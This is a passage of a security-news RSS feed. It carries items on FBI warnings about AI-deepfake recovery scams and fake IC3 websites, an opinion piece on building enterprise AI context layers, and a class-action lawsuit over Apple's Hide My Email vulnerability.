<p>The post <a href="https://cybersecuritynews.com/a-single-extra-t-in-a-nuget-package/">A Single Extra “t” in a NuGet Package Allow Attackers to Manipulate Results</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI Warns Scammers Use AI Deepfakes and Fake IC3 Sites to Re-Victimize Fraud Victims]]></title>
<description><![CDATA[The FBI has issued a new Public Service Announcement warning that cybercriminals are increasingly using AI-generated deepfakes and spoofed Internet Crime Complaint Center (IC3) websites to target victims who have already lost money to scams. This advisory, released on July…
Read more →
The post F...]]></description>
<link>https://tsecurity.de/de/3686413/it-security-nachrichten/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-sites-to-re-victimize-fraud-victims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686413/it-security-nachrichten/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-sites-to-re-victimize-fraud-victims/</guid>
<pubDate>Wed, 22 Jul 2026 15:13:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The FBI has issued a new Public Service Announcement warning that cybercriminals are increasingly using AI-generated deepfakes and spoofed Internet Crime Complaint Center (IC3) websites to target victims who have already lost money to scams. This advisory, released on July…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-sites-to-re-victimize-fraud-victims/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-sites-to-re-victimize-fraud-victims/">FBI Warns Scammers Use AI Deepfakes and Fake IC3 Sites to Re-Victimize Fraud Victims</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How a contextual AI fabric turns organizational memory into AI advantage]]></title>
<description><![CDATA[Across industries, a version of the same conversation is playing out in technology leadership meetings. Enterprises have deployed AI broadly, and foundation models keep getting more capable. Yet the outputs still feel generic, shaped by industry patterns rather than by the organization producing ...]]></description>
<link>https://tsecurity.de/de/3686065/it-nachrichten/how-a-contextual-ai-fabric-turns-organizational-memory-into-ai-advantage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686065/it-nachrichten/how-a-contextual-ai-fabric-turns-organizational-memory-into-ai-advantage/</guid>
<pubDate>Wed, 22 Jul 2026 13:05:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Across industries, a version of the same conversation is playing out in technology leadership meetings. Enterprises have deployed AI broadly, and foundation models keep getting more capable. Yet the outputs still feel generic, shaped by industry patterns rather than by the organization producing them.</p>



<p class="wp-block-paragraph"><a href="https://www.mckinsey.com/capabilities/tech-and-ai/our-insights/tech-forward/state-of-ai-trust-in-2026-shifting-to-the-agentic-era">McKinsey’s AI Trust Maturity Survey</a> found that while overall AI maturity scores have improved, only about a third of organizations have reached a mature level of strategy and governance. Technical capability is advancing faster than organizational alignment. In my view, the gap is not a model problem. It is a context problem. Enterprises are feeding generic inputs into powerful models because sharing organizational context seamlessly with AI is neither easy nor intuitive today.</p>



<p class="wp-block-paragraph">Building the analytical and creative capabilities to scale AI, something I explored in a <a href="https://www.cio.com/article/4176549/why-scaling-ai-requires-both-left-brain-rigor-and-right-brain-ingenuity.html">recent piece</a> on the left-brain and right-brain approach to enterprise AI, is necessary but not sufficient. Before either can function effectively, the enterprise needs something more fundamental. AI that actually understands the contextual fabric of the organization it is operating in. A frontier model has processed everything written about your sector, your competitors and your regulatory landscape. It cannot access the reasoning embedded in years of delivery decisions, the patterns encoded in how your teams scope and deliver work over time. That knowledge is organizational memory, and frontier models can’t get that easily. It exists inside every enterprise but has never been structured, connected or made available to any AI system. Without it, even the most capable model answers a generic version of your question.</p>



<p class="wp-block-paragraph">The next competitive advantage in enterprise AI will not come from a better model. It will come from a better organizational context.</p>



<p class="wp-block-paragraph">One global technology enterprise set out to solve this across its own operations, building a modular ecosystem of domain-specific agents grounded in its own data across contracting, talent and vendor management workflows. What emerged was not just operational efficiency but a shared intelligence layer connecting decisions across functions for the first time.</p>



<h2 class="wp-block-heading">Competitive differentiation was never about the tools</h2>



<p class="wp-block-paragraph">Consider what actually separates high-performing enterprises from the rest. In a regulated industry like financial services or healthcare, organizations cannot meaningfully differentiate on product. A bank cannot offer substantially different products or services. A health system uses the same clinical protocols and the same electronic health record (EHR) platforms as its peers. What varies is everything underneath: the rigor of processes, the coherence of cross-functional decisions and the people who carry years of accumulated organizational judgment in how they make those decisions.</p>



<p class="wp-block-paragraph">An organization with a proper context layer in place can say with precision that for this type of engagement, in this sector, with this risk profile, our institutional history tells us exactly where we stand. That level of specificity is what most enterprises have never made available to AI.</p>



<h2 class="wp-block-heading">The enterprise AI brain that every organization has but has never assembled</h2>



<p class="wp-block-paragraph">Every enterprise already possesses what I think of as an enterprise AI brain. The problem is that it has never been assembled in one place. The data exists across contracts, project documentation, talent records, delivery metrics and the operational communications of daily execution — the informal reasoning that rarely makes it into formal systems.</p>



<p class="wp-block-paragraph">None of the standard enterprise platforms were designed to connect this. A customer relationship management (CRM) system captures customer interactions. An enterprise resource planning (ERP) system captures transactions. A project management tool captures tasks and timelines. None of them captures the reasoning behind decisions and none of them surfaces a coherent picture of how the organization actually thinks and operates.</p>



<p class="wp-block-paragraph"><a href="https://www.bcg.com/publications/2026/ai-transformation-is-a-workforce-transformation">BCG’s study</a> across hundreds of companies found that only 10% of AI value comes from the algorithms and another 20% from the technology that implements them, meaning the remaining 70% depends on people, processes and organizational change. The organizations extracting real value are those that have made their institutional knowledge available to AI in a structured, governed way.</p>



<h2 class="wp-block-heading">Building a contextual AI fabric</h2>



<p class="wp-block-paragraph">A Contextual AI Fabric is the technical and organizational layer that makes the Enterprise AI Brain usable. It brings together unstructured data ingestion, semantic structuring, retrieval pipelines and governed model access to give AI systems the organizational context they need to produce outputs that are genuinely specific to your enterprise rather than generically accurate about your industry. It rests on three pillars. Core is the secure, governed and interoperable foundation that AI operations run on. Context is reliable, traceable access to the organization’s data, processes, knowledge and history. Coordination connects people, agents, applications and systems into process-driven workflows with clear controls and accountability, so the organization acts as one rather than a set of disconnected functions.</p>



<p class="wp-block-paragraph">The data layer is where most organizations underestimate the work. Contracts, project reports, talent assessments and operational communications require extraction, chunking, embedding and indexing before a model can retrieve and reason over them meaningfully.</p>



<p class="wp-block-paragraph">The semantic layer is what makes retrieval meaningful. Even well-ingested data fails if functions use different terminology for the same concepts. What legal calls a contract, delivery calls a scope. Without a shared ontology, AI systems remain precise about the wrong thing. And retrieval alone, however well-structured, only takes an organization so far. Retrieval surfaces the right information at the moment of a query, but it does not give a model genuine memory of the organization. The real source of unique, organization-level relevance comes from training domain-specific small language models on this context directly, models that carry organizational memory forward rather than fetching it fresh every time. That is what ultimately separates a Contextual AI Fabric from a well-organized database.</p>



<p class="wp-block-paragraph">The governance layer is not an add-on. Access controls, data lineage, approval thresholds and human checkpoints need to be designed in before any agent goes into production. Security is not a layer you add afterward. It is the condition under which organizational AI is worth building. If the institutional intelligence that makes your enterprise distinct gets absorbed into a frontier model’s training data, it becomes everyone’s baseline. That is an architectural decision made, or avoided, at the point of deployment.</p>



<h2 class="wp-block-heading">Proprietary by design</h2>



<p class="wp-block-paragraph">The institutional knowledge that makes up a contextual AI fabric — delivery history, commercial patterns, talent intelligence and operating culture — is proprietary in ways no external model can replicate. This is as much a security imperative as it is a competitive one. Organizational context, once exposed, cannot be unexposed.</p>



<p class="wp-block-paragraph">Most enterprises are using AI to automate existing processes rather than questioning whether those processes should be redesigned entirely. The organizations extracting the most value are those willing to ask whether their current operating model, built before GenAI existed, is the one they would build today. That question is harder than any technology decision, and it is also the most consequential one.</p>



<h2 class="wp-block-heading">From context to coordinated action</h2>



<p class="wp-block-paragraph">Context alone is not enough. When a delivery risk surfaces in project data, the talent function needs to respond. When a commercial signal changes in contract data, operations need to recalibrate. This kind of cross-functional coordination, driven by shared organizational intelligence rather than siloed data, is where the real value of enterprise AI shows up and where the absence of a shared context layer becomes most visible.</p>



<p class="wp-block-paragraph">A global leader in digital payments and business services found its AI deployments across payroll, HR and risk compliance, each running in isolation, with no shared governance or common data foundation. Once the organization established a unified governance backbone connecting its operational data through a shared retrieval layer, business users could query across domains in plain language and new use cases across fraud analytics, forecasting and policy extraction became extensible without rebuilding infrastructure for each one. The shift was not in the models. It was in the shared foundation underneath them.</p>



<h2 class="wp-block-heading">The leadership question behind the technology question</h2>



<p class="wp-block-paragraph">The enterprises pulling ahead in AI are not winning on model quality but on organizational memory. The ones that have done the hard work of structuring their institutional knowledge into a governed, secure Contextual AI Fabric are giving their AI something no competitor can replicate: the accumulated intelligence of how the business actually operates.</p>



<p class="wp-block-paragraph">For CIOs, the question is no longer which model to deploy. It is whether the organization has built the foundation that would make any model worth deploying.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI Warns Scammers Use AI Deepfakes and Fake IC3 Websites to Target Fraud Victims]]></title>
<description><![CDATA[The Federal Bureau of Investigation (FBI) has issued a new Public Service Announcement (Alert Number I-072026-PSA) regarding an evolving fraud campaign. Cybercriminals are increasingly using AI-generated deepfakes and spoofed Internet Crime Complaint Center (IC3) websites to target and re-victimi...]]></description>
<link>https://tsecurity.de/de/3685984/it-security-nachrichten/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-websites-to-target-fraud-victims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685984/it-security-nachrichten/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-websites-to-target-fraud-victims/</guid>
<pubDate>Wed, 22 Jul 2026 12:41:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Federal Bureau of Investigation (FBI) has issued a new Public Service Announcement (Alert Number I-072026-PSA) regarding an evolving fraud campaign. Cybercriminals are increasingly using AI-generated deepfakes and spoofed Internet Crime Complaint Center (IC3) websites to target and re-victimize individuals…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-websites-to-target-fraud-victims/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-websites-to-target-fraud-victims/">FBI Warns Scammers Use AI Deepfakes and Fake IC3 Websites to Target Fraud Victims</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI Warns Scammers Use AI Deepfakes and Fake IC3 Websites to Target Fraud Victims]]></title>
<description><![CDATA[The FBI has issued a new Public Service Announcement warning of an evolving fraud campaign in which threat actors impersonate the Internet Crime Complaint Center (IC3) and FBI personnel to re-target victims using AI-generated deepfakes and spoofed websites. Released on July 20, 2026, the alert hi...]]></description>
<link>https://tsecurity.de/de/3685963/it-security-nachrichten/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-websites-to-target-fraud-victims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685963/it-security-nachrichten/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-websites-to-target-fraud-victims/</guid>
<pubDate>Wed, 22 Jul 2026 12:24:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The FBI has issued a new Public Service Announcement warning of an evolving fraud campaign in which threat actors impersonate the Internet Crime Complaint Center (IC3) and FBI personnel to re-target victims using AI-generated deepfakes and spoofed websites. Released on July 20, 2026, the alert highlights a significant escalation in recovery scam tactics, where cybercriminals […]</p>
<p>The post <a href="https://cyberpress.org/scammers-use-ai-deepfakes-and-fake-ic3-websites/">FBI Warns Scammers Use AI Deepfakes and Fake IC3 Websites to Target Fraud Victims</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI Warns Scammers Use AI Deepfakes and Fake IC3 Websites to Target Fraud Victims]]></title>
<description><![CDATA[The Federal Bureau of Investigation (FBI) has issued a new Public Service Announcement (Alert Number I-072026-PSA) regarding an evolving fraud campaign. Cybercriminals are increasingly using AI-generated deepfakes and spoofed Internet Crime Complaint Center (IC3) websites to target and re-victimi...]]></description>
<link>https://tsecurity.de/de/3685953/it-security-nachrichten/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-websites-to-target-fraud-victims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685953/it-security-nachrichten/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-websites-to-target-fraud-victims/</guid>
<pubDate>Wed, 22 Jul 2026 12:24:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Federal Bureau of Investigation (FBI) has issued a new Public Service Announcement (Alert Number I-072026-PSA) regarding an evolving fraud campaign. Cybercriminals are increasingly using AI-generated deepfakes and spoofed Internet Crime Complaint Center (IC3) websites to target and re-victimize individuals who have already fallen prey to scams. Released on July 20, 2026, the alert highlights […]</p>
<p>The post <a href="https://gbhackers.com/fbi-warns-scammers-use-ai-deepfakes-target-fraud-victims/">FBI Warns Scammers Use AI Deepfakes and Fake IC3 Websites to Target Fraud Victims</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI Warns Scammers Use AI Deepfakes and Fake IC3 Sites to Re-Victimize Fraud Victims]]></title>
<description><![CDATA[The FBI has issued a new Public Service Announcement warning that cybercriminals are increasingly using AI-generated deepfakes and spoofed Internet Crime Complaint Center (IC3) websites to target victims who have already lost money to scams. This advisory, released on July 20, 2026, highlights ho...]]></description>
<link>https://tsecurity.de/de/3685908/it-security-nachrichten/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-sites-to-re-victimize-fraud-victims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685908/it-security-nachrichten/fbi-warns-scammers-use-ai-deepfakes-and-fake-ic3-sites-to-re-victimize-fraud-victims/</guid>
<pubDate>Wed, 22 Jul 2026 12:13:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The FBI has issued a new Public Service Announcement warning that cybercriminals are increasingly using AI-generated deepfakes and spoofed Internet Crime Complaint Center (IC3) websites to target victims who have already lost money to scams. This advisory, released on July 20, 2026, highlights how threat actors are evolving traditional fraud schemes by combining social engineering, […]</p>
<p>The post <a href="https://cybersecuritynews.com/fbi-warns-ai-deepfakes-using-fake-ic3-sites/">FBI Warns Scammers Use AI Deepfakes and Fake IC3 Sites to Re-Victimize Fraud Victims</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI Updates IC3 Scam Warning Over AI Videos Targeting Victims]]></title>
<description><![CDATA[The FBI IC3 scam has evolved into a broader fraud scheme in which criminals impersonate FBI personnel and the Internet Crime Complaint Center (IC3) to target people who have already fallen victim to scams. According to an updated Public Service Announcement (PSA), scammers are using AI-generated ...]]></description>
<link>https://tsecurity.de/de/3685580/it-security-nachrichten/fbi-updates-ic3-scam-warning-over-ai-videos-targeting-victims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685580/it-security-nachrichten/fbi-updates-ic3-scam-warning-over-ai-videos-targeting-victims/</guid>
<pubDate>Wed, 22 Jul 2026 10:08:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="FBI IC3 scam" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update.webp 1536w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update.webp 1536w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/FBI-IC3-scam-Update-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="FBI Updates IC3 Scam Warning Over AI Videos Targeting Victims 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="493" data-end="949">The FBI IC3 scam has evolved into a broader fraud scheme in which criminals impersonate FBI personnel and the <a href="https://thecyberexpress.com/scam-centers-in-southeast-asia/" target="_blank" rel="noopener">Internet Crime Complaint Center</a> (IC3) to target people who have already fallen victim to scams. According to an updated <a href="https://www.ic3.gov/PSA/2025/PSA250418" target="_blank" rel="nofollow noopener">Public Service Announcement</a> (PSA), scammers are using <a href="https://thecyberexpress.com/will-ai-generated-cyberattacks-surge-in-future/" target="_blank" rel="noopener">AI-generated videos</a>, <a href="https://thecyberexpress.com/ways-social-media-is-fuelling-cybercrime/" target="_blank" rel="noopener">fake social media profiles</a>, and spoofed websites to create a false sense of trust while attempting to steal personal and financial information.</p>
<p data-start="951" data-end="1367">The updated warning describes several exploitation tactics, including targeting previous scam victims, using artificial intelligence to create fictitious or misleading promotional materials, and building fake websites designed to collect personally identifiable information. The scammers falsely claim to be affiliated with government agencies or law enforcement and often promise to help victims recover lost funds.</p>

<h3 data-section-id="196yc7a" data-start="1369" data-end="1420"><strong><span role="text">FBI IC3 Scam Targets Previous Fraud Victims</span></strong></h3>
<p data-start="1422" data-end="1642">In one version of the FBI IC3 <a class="wpil_keyword_link" href="https://cyble.com/tech-scam/" target="_blank" rel="noopener" title="scam" data-wpil-keyword-link="linked" data-wpil-monitor-id="29073">scam</a>, criminals create fake social media profiles and pages that impersonate FBI personnel. The goal is to lure previous <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-scam-tips-for-safety/" title="scam" data-wpil-keyword-link="linked" data-wpil-monitor-id="29077">scam</a> victims into what the PSA describes as "re-targeting" scams.</p>
<p data-start="1644" data-end="1926">After realizing they have been defrauded, victims may tell the original scammers they plan to report the incident to the FBI and submit an IC3 complaint. The victim is then contacted by someone pretending to be an FBI agent through platforms such as Facebook Messenger and Telegram.</p>
<p data-start="1928" data-end="2139">The impersonator may send a link claiming to <a href="https://www.ic3.gov/PSA/2026/PSA260720" target="_blank" rel="nofollow noopener">update an existing IC3 complaint</a>. The link could contain malicious code or collect additional financial information, allowing criminals to further <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="29074">exploit</a> the victim.</p>
<p data-start="2141" data-end="2445">In other cases, scammers approach victims through email, phone calls, social media advertisements, or online forums. They claim to have recovered lost funds or offer assistance in recovering money. The FBI warning states these claims are a ruse designed to revictimize people who have already lost money.</p>

<h3 data-section-id="j1jslh" data-start="2447" data-end="2503"><span role="text"><strong data-start="2451" data-end="2503">AI-Generated Videos Promote Spoofed IC3 Websites</strong></span></h3>
<p data-start="2505" data-end="2724">Another version of the scheme involves AI-generated videos or <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-are-deepfakes/" target="_blank" rel="noopener" title="deepfakes" data-wpil-keyword-link="linked" data-wpil-monitor-id="29075">deepfakes</a> featuring individuals impersonating FBI personnel. The videos are used on social media to promote spoofed versions of the official IC3 website.</p>
<p data-start="2726" data-end="3010">One reported example involved an AI-generated video depicting a senior FBI leader encouraging users to submit complaints through a <a href="https://thecyberexpress.com/planning-and-zoning-permit-phishing-scam/" target="_blank" rel="noopener">fake IC3 website</a>. The spoofed site was designed to resemble the legitimate government website, but its functionality was limited to complaint submission.</p>
<p data-start="3012" data-end="3257">The fake complaint form requested information including a user's name, phone number, email address, scam type, and estimated financial loss. After submission, the site provided a reference number and claimed someone would contact the individual.</p>

<h3 data-section-id="17fdwcn" data-start="3259" data-end="3316"><strong><span role="text">How to Spot AI-Generated Videos and Fake Messages</span></strong></h3>
<p data-start="3318" data-end="3633">The PSA warns that scammers can use AI-generated videos and cloned voices to impersonate company executives, law enforcement personnel, and other authority figures. These materials may be used during real-time video chats or private communications to convince victims they are speaking with a legitimate person.</p>
<p data-start="3635" data-end="3986">People are advised to carefully examine email addresses, phone numbers, URLs, and spelling for subtle inconsistencies. Potential warning signs in manipulated images and videos include distorted hands or feet, unrealistic facial features, irregular faces, unusual accessories, inaccurate shadows, watermarks, unnatural movements, and voice call delays.</p>
<p data-start="3988" data-end="4235">The FBI also advises people to be cautious when online content triggers strong emotions such as fear, anger, or disbelief. Users should verify surprising videos or images through reputable <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="news" data-wpil-keyword-link="linked" data-wpil-monitor-id="29076">news</a> sources or known official channels before responding.</p>
<p data-start="4237" data-end="4538">IC3 does not maintain a social media presence and will not contact individuals directly through phone, email, social media, messaging apps, online chats, or public forums. The agency also does not recover funds for victims through Facebook or Telegram and will never request payment for fund recovery.</p>
<p data-start="4540" data-end="4834">People seeking to file an IC3 complaint should type <a class="decorated-link" href="http://www.ic3.gov/" target="_blank" rel="nofollow noopener" data-start="4594" data-end="4605">www.ic3.gov</a> directly into their browser and verify that the website address ends in ".gov." Victims should avoid sponsored search results and suspicious links, and should never share sensitive information with websites they cannot verify.</p>
<p data-start="4836" data-end="5068" data-is-last-node="" data-is-only-node="">Anyone who has fallen victim to the scam should report it through the legitimate IC3 website and provide details about the person or company involved, communication methods, financial transactions, and interactions with the scammer.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Faces Lawsuit Over Hide My Email Privacy Vulnerability]]></title>
<description><![CDATA[Apple is facing a proposed class-action lawsuit after Anthony Alvarez alleged that the company’s Hide My Email feature failed to protect users’ real email addresses as advertised. The complaint, filed in the U.S. District Court for the Northern District of California, claims Apple promoted Hide M...]]></description>
<link>https://tsecurity.de/de/3685568/it-security-nachrichten/apple-faces-lawsuit-over-hide-my-email-privacy-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685568/it-security-nachrichten/apple-faces-lawsuit-over-hide-my-email-privacy-vulnerability/</guid>
<pubDate>Wed, 22 Jul 2026 09:59:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1216" height="758" src="https://thecyberexpress.com/wp-content/uploads/Hide-My-Email.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Hide My Email" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Hide-My-Email.webp 1216w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-300x187.webp 300w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-1024x638.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-768x479.webp 768w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-600x374.webp 600w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-150x94.webp 150w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-750x468.webp 750w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-1140x711.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email.webp 1216w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-300x187.webp 300w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-1024x638.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-768x479.webp 768w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-600x374.webp 600w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-150x94.webp 150w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-750x468.webp 750w, https://thecyberexpress.com/wp-content/uploads/Hide-My-Email-1140x711.webp 1140w" sizes="(max-width: 1216px) 100vw, 1216px" title="Apple Faces Lawsuit Over Hide My Email Privacy Vulnerability 1"></p><span data-contrast="auto">Apple is facing a proposed class-action lawsuit after Anthony Alvarez alleged that the company’s Hide My Email feature failed to protect users’ real email addresses as advertised. The complaint, filed in the U.S. District Court for the Northern District of California, claims Apple promoted Hide My Email as a privacy safeguard while continuing to charge customers for access through its iCloud+ subscription service.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The legal action follows a report from <a href="https://www.404media.co/apple-fixes-hide-my-email-vulnerability-after-404-media-coverage/" target="_blank" rel="nofollow noopener">404 Media</a> that revealed a reported vulnerability in Hide My Email. The report claimed the flaw could allow someone to identify a user’s actual email address from the private relay address generated by the feature. According to the report, Apple had been aware of the issue for more than a year before releasing a fix.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Hide My Email Vulnerability Becomes the Focus of Apple Lawsuit</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Apple confirmed that it deployed a patch on July 3, 2026, stating that the Hide My Email <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="29072">vulnerability</a> had been fully resolved. However, the lawsuit alleges that Apple continued marketing the feature as secure while the reported weakness remained unresolved.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The complaint states that <a href="https://thecyberexpress.com/fortinet-silent-patch-raises-concern/" target="_blank" rel="noopener">security researchers</a> first informed Apple about the vulnerability in June 2025. Although Apple acknowledged the report, Anthony Alvarez’s lawsuit claims the company did not resolve the issue for nearly a year. The filing also alleges that Apple incorrectly stated in March 2026 that the problem had been fixed, even though researchers reported that the vulnerability remained exploitable.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">How Apple’s Hide My Email Feature Works</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Hide My Email was introduced with Sign in with Apple in 2019. The feature creates unique relay addresses for supported apps and websites, allowing messages to reach a user’s inbox without revealing the person’s actual email address.</span>

<span data-contrast="auto">Apple later expanded Hide My Email through the paid iCloud+ subscription, launched alongside iOS 15 and macOS Monterey in September 2021. The iCloud+ version allows subscribers to create unlimited private relay addresses for websites, newsletters and email communication.</span>

<span data-contrast="auto">The lawsuit argues that millions of <a href="https://thecyberexpress.com/apple-security-update-fixes-flaws/" target="_blank" rel="noopener">Apple</a> users relied on Hide My Email to reduce spam, limit online tracking, protect personal information from data brokers and avoid exposure during third-party data breaches. Researchers cited in the complaint said that once a real email address is revealed, it may be linked with publicly available people-search databases, potentially exposing identities and other personal information.</span>
<h3 aria-level="2"><b><span data-contrast="none">Anthony Alvarez Claims Apple Misled Customers Over Privacy</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The complaint argues that Apple built much of its brand identity around <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-privacy/" title="privacy" data-wpil-keyword-link="linked" data-wpil-monitor-id="29071">privacy</a>, referencing marketing statements such as “Privacy. That’s iPhone,” “What happens on your iPhone, stays on your iPhone,” and descriptions of privacy as a “fundamental human right” and “core value.”</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">According to the <a href="https://storage.courtlistener.com/recap/gov.uscourts.cand.474371/gov.uscourts.cand.474371.1.0.pdf" target="_blank" rel="nofollow noopener">lawsuit</a>, Apple’s privacy messaging influenced consumer decisions and helped justify premium pricing for Apple hardware and services. The plaintiffs claim Hide My Email was promoted as a central part of those privacy commitments.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The filing alleges that Apple asked researchers not to publicly disclose details of the vulnerability instead of warning customers or temporarily disabling the feature. It claims users were never informed that their real email addresses could potentially be exposed while Apple continued presenting Hide My Email as a <a href="https://thecyberexpress.com/california-france-data-privacy-protections/" target="_blank" rel="noopener">privacy protection</a> tool.</span><span data-ccp-props="{}"> </span>
